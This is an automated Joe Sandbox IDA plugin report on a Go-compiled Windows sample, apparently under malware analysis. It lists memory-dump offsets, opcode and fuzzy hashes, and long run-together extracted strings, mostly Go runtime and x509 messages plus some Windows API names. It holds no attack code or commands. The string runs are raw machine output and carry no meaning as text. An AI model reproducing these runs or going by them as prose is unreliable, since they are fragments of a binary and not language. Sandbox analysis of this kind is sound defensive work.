                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ()*+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02$) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWDeclSecurityDispCallFuncDispGetParamECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCExportedTypeFieldMarshalFindNext$wirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundx509: malformed spkizlib: invalid header of unexported method pcHeader.textStart= previous allocCount=, levelBits[level] = 186264514923095703125931322574615478515625AdjustTokenPri$wirep: invalid p statex509: malformed issuerzero length BIT STRINGzlib: invalid checksum) must be a power of 223283064365386962890625<invalid .Value>Argentina Standard TimeAstrakhan Standard TimeCertGetCertificateChainDeleteVolumeMountPointWDestroyEnvi$wirep: p->m=worker mode wtsapi32.dll != sweepgen (default %q) (default %v) MB globals, MB) workers= called from flushedWork idlethreads= in host name is nil, not nStackRoots= out of range pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= wo
                                                                                • API String ID: 0-1935930808
                                                                                • Opcode ID: 0e71991c3413a38bc6c6c971115fef64b93dcade1c99336920515059ce361f3e
                                                                                • Instruction ID: 4d905353dfe0a6bc243fcc7bfea84211faad0066e9b11674caef25802fa7ea9e
                                                                                • Opcode Fuzzy Hash: 0e71991c3413a38bc6c6c971115fef64b93dcade1c99336920515059ce361f3e
                                                                                • Instruction Fuzzy Hash: 6731B6B4A09B45CFD700EF69D29571ABBE4FF88708F41896DE8888B312E774D844DB52
                                                                                Strings
                                                                                • ), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT, xrefs: 00AE0783
                                                                                • runtime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external, xrefs: 00AE072E
                                                                                • runtime/internal/runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait , xrefs: 00AE079E
                                                                                • already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00AE0759
                                                                                • ., xrefs: 00AE0737
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: runtime/internal/runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait $ already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory$), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADT$.$runtime: failed to create new OS thread (have runtime: name offset base pointer out of rangeruntime: panic before malloc heap initializedruntime: text offset base pointer out of rangeruntime: type offset base pointer out of rangesignal arrived during external
                                                                                • API String ID: 0-1382676746
                                                                                • Opcode ID: 39e6ebe697231075b71db1dd91c60982b4d8c09402080e457965d0b1b8c0787f
                                                                                • Instruction ID: c32f855c7476369b8866649fa90399896ff5dda93846afcf8f9d4e398cf65457
                                                                                • Opcode Fuzzy Hash: 39e6ebe697231075b71db1dd91c60982b4d8c09402080e457965d0b1b8c0787f
                                                                                • Instruction Fuzzy Hash: 3831E2B49097449FC304EF7AE69575EBBE4BF88308F414D2DE48897352E7B499888F42
                                                                                Strings
                                                                                • runtime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetx509: cannot verify signature: insecure algorithm %vcompileCallback: argument size is larger than uintpt, xrefs: 00ADE1E7
                                                                                • ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNS, xrefs: 00ADE212
                                                                                • runtime: netpoll failedruntime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)truncat, xrefs: 00ADE22D
                                                                                • 4, xrefs: 00ADE1F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNS$4$runtime: GetQueuedCompletionStatusEx failed (errno= runtime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetx509: cannot verify signature: insecure algorithm %vcompileCallback: argument size is larger than uintpt$runtime: netpoll failedruntime: s.allocCount= s.allocCount > s.nelemsschedule: holding lockssegment length too longshrinkstack at bad timespan has no free stacksstack growth after forksyntax error in patternsystem huge page size (too many pointers (>10)truncat
                                                                                • API String ID: 0-3734344902
                                                                                • Opcode ID: d4a73b888aae0450133119f1918c2f34ecd19b0c56d230ef74b11b92a85bb253
                                                                                • Instruction ID: bb14576dded185a2d38c58210d34a6a1518d8a417bc73da607655d8ac82f8a7b
                                                                                • Opcode Fuzzy Hash: d4a73b888aae0450133119f1918c2f34ecd19b0c56d230ef74b11b92a85bb253
                                                                                • Instruction Fuzzy Hash: F8A17AB46093418FD320EF25C580B5EBBE1BF88748F04892EE89A8B381D774D945CB93
                                                                                Strings
                                                                                • forEachP: not donegarbage collectionidentifier removedindex out of rangeinput/output errorinvalid character multihop attemptedno child processesno locks availablenon-minimal lengthoperation canceled :, xrefs: 00AE9062
                                                                                • ", xrefs: 00AE9081
                                                                                • forEachP: P did not run fnfreedefer with d.fn != nilinitSpan: unaligned lengthinvalid argument to Int31ninvalid argument to Int63ninvalid port %q after hostinvalid request descriptorname not unique on networkno CSI structure availableno message of desired type, xrefs: 00AE904C
                                                                                • forEachP: sched.safePointWait != 0invalid padding bits in BIT STRINGmspan.ensureSwept: m is not lockedout of memory allocating allArenaspkcs7: attribute %s does not exist : ChanDir of non-chan type : Field index out of bounds : Field of non-, xrefs: 00AE9078
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "$forEachP: P did not run fnfreedefer with d.fn != nilinitSpan: unaligned lengthinvalid argument to Int31ninvalid argument to Int63ninvalid port %q after hostinvalid request descriptorname not unique on networkno CSI structure availableno message of desired type$forEachP: not donegarbage collectionidentifier removedindex out of rangeinput/output errorinvalid character multihop attemptedno child processesno locks availablenon-minimal lengthoperation canceled :$forEachP: sched.safePointWait != 0invalid padding bits in BIT STRINGmspan.ensureSwept: m is not lockedout of memory allocating allArenaspkcs7: attribute %s does not exist : ChanDir of non-chan type : Field index out of bounds : Field of non-
                                                                                • API String ID: 0-3226464621
                                                                                • Opcode ID: 653a6764c67912497ad2efba466a8a04d805e698cdc5f7b2fe8b19ad971766e5
                                                                                • Instruction ID: d479aa3026e9d70597242e06f9d2f4f44de5346be62c4d652b7bcb4b80b32b6d
                                                                                • Opcode Fuzzy Hash: 653a6764c67912497ad2efba466a8a04d805e698cdc5f7b2fe8b19ad971766e5
                                                                                • Instruction Fuzzy Hash: 23A16674609345CFC304DF26D5D4AAABBF1FB99304F10486DE8899B3A2DB34E949CB52
                                                                                Strings
                                                                                • nil stackbaseout of memoryparsing time powrprof.dll, xrefs: 00AF8F2C
                                                                                • stack growth not allowed in system callsuspendG from non-preemptible goroutinetags don't match (%d vs %+v) %+v %s @%dtraceback: unexpected SPWRITE function transport endpoint is already connectedx509: failed to parse URI constraint %qx509: invalid NameConstrai, xrefs: 00AF8F42
                                                                                • racy sudog adjustment due to parking on channelruntime: CreateIoCompletionPort failed (errno= slice bounds out of range [::%x] with length %yx509: internal error: IP SAN %x failed to parsex509: malformed public key algorithm identifierCreateWaitableTimerEx whe, xrefs: 00AF8EA1
                                                                                • ', xrefs: 00AF8F4B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: '$nil stackbaseout of memoryparsing time powrprof.dll$racy sudog adjustment due to parking on channelruntime: CreateIoCompletionPort failed (errno= slice bounds out of range [::%x] with length %yx509: internal error: IP SAN %x failed to parsex509: malformed public key algorithm identifierCreateWaitableTimerEx whe$stack growth not allowed in system callsuspendG from non-preemptible goroutinetags don't match (%d vs %+v) %+v %s @%dtraceback: unexpected SPWRITE function transport endpoint is already connectedx509: failed to parse URI constraint %qx509: invalid NameConstrai
                                                                                • API String ID: 0-3277552357
                                                                                • Opcode ID: 2b74b2073f5fd8f99f7bcb142dfee246a4f39738009fcc20c4949aaeb6badd98
                                                                                • Instruction ID: 9a5a93f7ca22735906d2db9a3f95b206efcff18d668c1c8ce506e7151a5828f0
                                                                                • Opcode Fuzzy Hash: 2b74b2073f5fd8f99f7bcb142dfee246a4f39738009fcc20c4949aaeb6badd98
                                                                                • Instruction Fuzzy Hash: 32A1DF746093448FC758DF68C180A6AFBF1BF88710F15896EF99987392EB74E844CB46
                                                                                Strings
                                                                                • runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=transform: inconsistent byte count returnedunfinished open-coded defers in deferreturnunknown runnable goroutine during bootstrapx5, xrefs: 00AC1E6C
                                                                                • but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertClos, xrefs: 00AC1E96
                                                                                • +, xrefs: 00AC1ED3
                                                                                • heapBitsSetTypeGCProg: unexpected bit countinterrupted system call should be restartedmethodValueCallFrameObjs is not in a modulemult64bitPow10: power of 10 is out of rangemultiple Read calls return no data or errornon in-use span found with specials bit setof, xrefs: 00AC1ECA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertClos$+$heapBitsSetTypeGCProg: unexpected bit countinterrupted system call should be restartedmethodValueCallFrameObjs is not in a modulemult64bitPow10: power of 10 is out of rangemultiple Read calls return no data or errornon in-use span found with specials bit setof$runtime: heapBitsSetTypeGCProg: total bits runtime: releaseSudog with non-nil gp.paramruntime:stoplockedm: lockedg (atomicstatus=transform: inconsistent byte count returnedunfinished open-coded defers in deferreturnunknown runnable goroutine during bootstrapx5
                                                                                • API String ID: 0-2138322421
                                                                                • Opcode ID: 7f81556d8fcef66b69d6c1e15444444d9d6b286359a7da0ff032ad38d62891af
                                                                                • Instruction ID: 6579c99f8b07f831653d32956352bcb190318087400d29925a77599501251079
                                                                                • Opcode Fuzzy Hash: 7f81556d8fcef66b69d6c1e15444444d9d6b286359a7da0ff032ad38d62891af
                                                                                • Instruction Fuzzy Hash: EF715F747093418BC718EF68C59572EB7E2AB89304F56892EE48687382DB35CC49CBD3
                                                                                Strings
                                                                                • 1, xrefs: 00AB99D0
                                                                                • notetsleep - waitm out of syncprotocol wrong type for socket : Elem of invalid type : Len of non-array type : Out of non-func type rich header parsing failed: %vrunqputslow: queue is not fullruntime: bad g in cgocallbackruntime: bad pointer, xrefs: 00AB9835
                                                                                • runtime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ystrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countsweeper left ou, xrefs: 00AB99C7
                                                                                • runtime: unable to acquire - semaphore out of syncunhandled metadata table %d %s offset 0x%x cols %dx509: RSA public exponent is not a positive numberx509: invalid RDNSequence: invalid attribute valuex509: missing ASN.1 contents; use ParseCertificateExport dir, xrefs: 00AB99B1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 1$notetsleep - waitm out of syncprotocol wrong type for socket : Elem of invalid type : Len of non-array type : Out of non-func type rich header parsing failed: %vrunqputslow: queue is not fullruntime: bad g in cgocallbackruntime: bad pointer$runtime: unable to acquire - semaphore out of syncunhandled metadata table %d %s offset 0x%x cols %dx509: RSA public exponent is not a positive numberx509: invalid RDNSequence: invalid attribute valuex509: missing ASN.1 contents; use ParseCertificateExport dir$runtime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ystrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countsweeper left ou
                                                                                • API String ID: 0-4093100599
                                                                                • Opcode ID: fdf9f3dadf14b9f26911cb5e6001698d64350f876b91d15c4fd34bfa2ef1e096
                                                                                • Instruction ID: a9a99811b51fbec45cd75a733b71fda0b948eb3b74aa2ab971b927a27a4eaa87
                                                                                • Opcode Fuzzy Hash: fdf9f3dadf14b9f26911cb5e6001698d64350f876b91d15c4fd34bfa2ef1e096
                                                                                • Instruction Fuzzy Hash: D3718AB46093518FD354DF69C580B5BBBE0BF88704F05896CE8E89B3A2D771D844CBA2
                                                                                Strings
                                                                                • runtime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectoo many invalid names, aborting parsingx509: cannot parse IP address of length x509: malformed extension critical field34694469519536141888, xrefs: 00AD4EB5
                                                                                • in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:00244140625: status=Authorit, xrefs: 00AD4F09
                                                                                • (, xrefs: 00AD4EBE
                                                                                • -byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcessesExitWindowsExFindFirstFileFindNextFileWFindResourceW, xrefs: 00AD4EDF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:00244140625: status=Authorit$($-byte block (3814697265625Align 2-BytesAlign 4-BytesAlign 8-BytesAssemblyRefOSBSTR_UserFreeBSTR_UserSizeCertOpenStoreClearCustDataCoTaskMemFreeCreateTypeLibDeleteServiceEFI ROM imageEFI byte codeEnumProcessesExitWindowsExFindFirstFileFindNextFileWFindResourceW$runtime: out of memory: cannot allocate runtime: typeBitsBulkBarrier with type ryuFtoaFixed32 called with negative prectoo many invalid names, aborting parsingx509: cannot parse IP address of length x509: malformed extension critical field34694469519536141888
                                                                                • API String ID: 0-4013262594
                                                                                • Opcode ID: 7b0fd05fd4612dccb0f51e8758f24490980430a8bddb7d644d23fb6e001369e6
                                                                                • Instruction ID: 8c75dfe3b3097c96be3d2e6490019aaf6e7f4a55992b7e44957ad0834795134c
                                                                                • Opcode Fuzzy Hash: 7b0fd05fd4612dccb0f51e8758f24490980430a8bddb7d644d23fb6e001369e6
                                                                                • Instruction Fuzzy Hash: 1181E2B49097059FC300EF69D58069EBBF0FF88744F44892EE8898B312E775D849CB52
                                                                                Strings
                                                                                • startm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2x509: invalid version%SystemRoot%\system32\/lib/time/zoneinfo.zip4656612873077392578125Aleutian Standard TimeAtla, xrefs: 00AEA114
                                                                                • startm: negative nmspinningstopTheWorld: holding lockstime: invalid location nametimer when must be positivetoo many callback functionsunsupported string type: %vwork.nwait was > work.nprocx509: malformed certificate args stack map entries for 1818989403545856, xrefs: 00AEA0D2
                                                                                • startm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00AEA0FE
                                                                                • startm: p has runnable gsstoplockedm: not runnableunexpected '[' in addressunexpected ']' in addressunexpected fault address unexpected key value typeunknown Go type for slicex509: invalid RDNSequencex509: invalid RSA modulusx509: malformed extensionx509: malf, xrefs: 00AEA0E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: startm: m has pstopm holding punknown Go type already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory$startm: m is spinningstate not recoverabletimer data corruptiontrace/breakpoint trapunexpected value stepuser defined signal 1user defined signal 2x509: invalid version%SystemRoot%\system32\/lib/time/zoneinfo.zip4656612873077392578125Aleutian Standard TimeAtla$startm: negative nmspinningstopTheWorld: holding lockstime: invalid location nametimer when must be positivetoo many callback functionsunsupported string type: %vwork.nwait was > work.nprocx509: malformed certificate args stack map entries for 1818989403545856$startm: p has runnable gsstoplockedm: not runnableunexpected '[' in addressunexpected ']' in addressunexpected fault address unexpected key value typeunknown Go type for slicex509: invalid RDNSequencex509: invalid RSA modulusx509: malformed extensionx509: malf
                                                                                • API String ID: 0-3722663094
                                                                                • Opcode ID: 16363d221a4c84b7f746662edcf3d2e3629e971b62cc721d8f5a25425ad6b850
                                                                                • Instruction ID: 32611d9d036defcb36bccc9f3daf7fea91e481aa0be8921e630a38b537f11111
                                                                                • Opcode Fuzzy Hash: 16363d221a4c84b7f746662edcf3d2e3629e971b62cc721d8f5a25425ad6b850
                                                                                • Instruction Fuzzy Hash: 1E6169B45083848FC714DF25C194B6ABBE0FF99704F0489ADE8998B362D335E989DF52
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $ $ $
                                                                                • API String ID: 0-3535155489
                                                                                • Opcode ID: 38b74be8d341230c14d5fa5e1864e5ad426e7d10a718156ff98887734e68f1b5
                                                                                • Instruction ID: 1ccf7750c97351d289ff00ce3794f69992cc4ab5dd73ba6798d8e66f81b17c3b
                                                                                • Opcode Fuzzy Hash: 38b74be8d341230c14d5fa5e1864e5ad426e7d10a718156ff98887734e68f1b5
                                                                                • Instruction Fuzzy Hash: 8571D074509781CFC324DF28C194B5ABBE2BFC9314F158A2EE49A9B391DB34D845CB92
                                                                                Strings
                                                                                • &, xrefs: 00AB384F
                                                                                • runtime: bad g in cgocallbackruntime: bad pointer in frame runtime: found in object at *(runtime: impossible type kind socket operation on non-socketsync: inconsistent mutex statesync: unlock of unlocked mutextransform: short source bufferx509: SAN dNSName is, xrefs: 00AB3721
                                                                                • cgocall nilclobberfreeclosesocketcreated by crypt32.dllfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedgetaddrinfogethostnamegetnameinfogetpeernamegetsocknamei/o timeoutioctlsocketmSpanManualmethodargs(mswsock.dllnetpoll, xrefs: 00AB36E4
                                                                                • m changed unexpectedly in cgocallbackgmakechan: invalid channel element typeruntime: blocked read on free polldescruntime: sudog with non-false isSelectstrings.Reader.ReadAt: negative offsetstrings.Reader.Seek: negative positiontime: missing Location in call t, xrefs: 00AB3846
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: &$cgocall nilclobberfreeclosesocketcreated by crypt32.dllfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedgetaddrinfogethostnamegetnameinfogetpeernamegetsocknamei/o timeoutioctlsocketmSpanManualmethodargs(mswsock.dllnetpoll$m changed unexpectedly in cgocallbackgmakechan: invalid channel element typeruntime: blocked read on free polldescruntime: sudog with non-false isSelectstrings.Reader.ReadAt: negative offsetstrings.Reader.Seek: negative positiontime: missing Location in call t$runtime: bad g in cgocallbackruntime: bad pointer in frame runtime: found in object at *(runtime: impossible type kind socket operation on non-socketsync: inconsistent mutex statesync: unlock of unlocked mutextransform: short source bufferx509: SAN dNSName is
                                                                                • API String ID: 0-1219494809
                                                                                • Opcode ID: db10149a72225d70a38422b372ac17b9cf804a08b2a6084c9c72933bf468a360
                                                                                • Instruction ID: 3af1baf3689085d434df95dc978573aae40be43fdbe4f39c7c0e9e8e0869a8c1
                                                                                • Opcode Fuzzy Hash: db10149a72225d70a38422b372ac17b9cf804a08b2a6084c9c72933bf468a360
                                                                                • Instruction Fuzzy Hash: 8061C5B46093409FC704DF64C194BAABBE1FF89304F5588ADE8898B362D775E845CF52
                                                                                Strings
                                                                                • s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWDeclSecurityDispCallFuncDispGetP, xrefs: 00AD1964
                                                                                • non in-use span in unswept listpacer: sweep done at heap size pattern contains path separatorpkcs7: unsupported algorithm %q : negative cap : negative len : Len of non-array type : NumIn of non-func typeresetspinnin, xrefs: 00AD19C2
                                                                                • sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday((BADINDEX), bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagari, xrefs: 00AD198E
                                                                                • runtime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to metoo many colons in addresstruncated base 128 integeruse of invalid sweepLockerx509: invalid simple chainx509: malformed extensions, xrefs: 00AD1936
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons/mark -byte limit152587890625762939453125Align 1-ByteArchitectureBidi_ControlCfgMgr32.dllCoCreateGuidCreateEventWCreateMutexWDeclSecurityDispCallFuncDispGetP$ sweepgen= targetpc= throwing= until pc=%!(NOVERB)%!Weekday((BADINDEX), bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagari$non in-use span in unswept listpacer: sweep done at heap size pattern contains path separatorpkcs7: unsupported algorithm %q : negative cap : negative len : Len of non-array type : NumIn of non-func typeresetspinnin$runtime: bad span s.state=runtime: pcHeader: magic= segment prefix is reservedshrinking stack in libcallstartlockedm: locked to metoo many colons in addresstruncated base 128 integeruse of invalid sweepLockerx509: invalid simple chainx509: malformed extensions
                                                                                • API String ID: 0-1656947467
                                                                                • Opcode ID: 6a2c4b3e0e5c30f2261ea1a584810447f8d9ef82cb4a5cdc44c716ab7dfe1e69
                                                                                • Instruction ID: 444c1e1802eac484b0b4e831a9d4a724d2c6ac8487deceac3cb5c5d52292c3ae
                                                                                • Opcode Fuzzy Hash: 6a2c4b3e0e5c30f2261ea1a584810447f8d9ef82cb4a5cdc44c716ab7dfe1e69
                                                                                • Instruction Fuzzy Hash: C16152B4508385AFC300EF65D1A0A6EBBE0AF89304F40496EF8C987362E734D948DF52
                                                                                Strings
                                                                                • <=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06, xrefs: 00AE5F00
                                                                                • +,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03, xrefs: 00AE5F2A
                                                                                • , xrefs: 00AE5E45
                                                                                • : ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCE, xrefs: 00AE5DFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
